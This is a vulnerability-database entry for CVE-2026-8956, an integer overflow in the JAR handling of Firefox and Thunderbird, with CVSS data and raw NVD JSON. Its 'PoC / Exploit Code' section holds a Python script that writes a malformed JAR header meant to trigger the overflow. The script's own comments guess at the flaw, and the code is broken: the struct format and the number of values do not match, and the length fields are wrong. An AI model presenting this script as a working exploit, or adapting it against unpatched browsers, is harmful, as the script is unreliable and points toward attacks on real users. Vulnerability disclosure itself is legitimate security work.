Security Vulnerability Report
中文
CVE-2026-8956 CVSS 9.8 CRITICAL

CVE-2026-8956

Published: 2026-05-19 14:16:52
Last Modified: 2026-05-19 18:16:34

Description

Integer overflow in the Networking: JAR component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Firefox < 151
Firefox ESR < 140.11
Thunderbird < 151
Thunderbird < 140.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct # Proof of Concept for CVE-2026-8956 # This script generates a malformed JAR file header to trigger the integer overflow. def generate_malicious_jar(): # JAR files are essentially ZIP files. # We simulate a Local File Header with a manipulated compressed size. # If the parser adds a constant to this size without checking overflow, # it may wrap around to a small positive number. signature = 0x04034b50 # Local file header signature version_needed = 20 flags = 0 compression_method = 0 # Store # Malicious size value intended to cause overflow during calculation # E.g., if logic is 'size + header_len', this might wrap around 32-bit int malicious_size = 0xFFFFFFF0 filename_len = 10 extra_len = 0 header = struct.pack('<IHHHHHHIIIHH', signature, version_needed, flags, compression_method, 0, # mod time 0, # mod date 0, # crc32 malicious_size, # compressed size malicious_size, # uncompressed size filename_len, extra_len) filename = b'test.txt' payload = header + filename with open('exploit.jar', 'wb') as f: f.write(payload) # Fill rest with dummy data to match size if necessary f.write(b'A' * 100) print("Malformed JAR file generated: exploit.jar") if __name__ == "__main__": generate_malicious_jar()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8956", "sourceIdentifier": "[email protected]", "published": "2026-05-19T14:16:51.943", "lastModified": "2026-05-19T18:16:34.337", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Integer overflow in the Networking: JAR component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2032427", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-46/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-48/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-50/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-51/", "source": "[email protected]"}]}}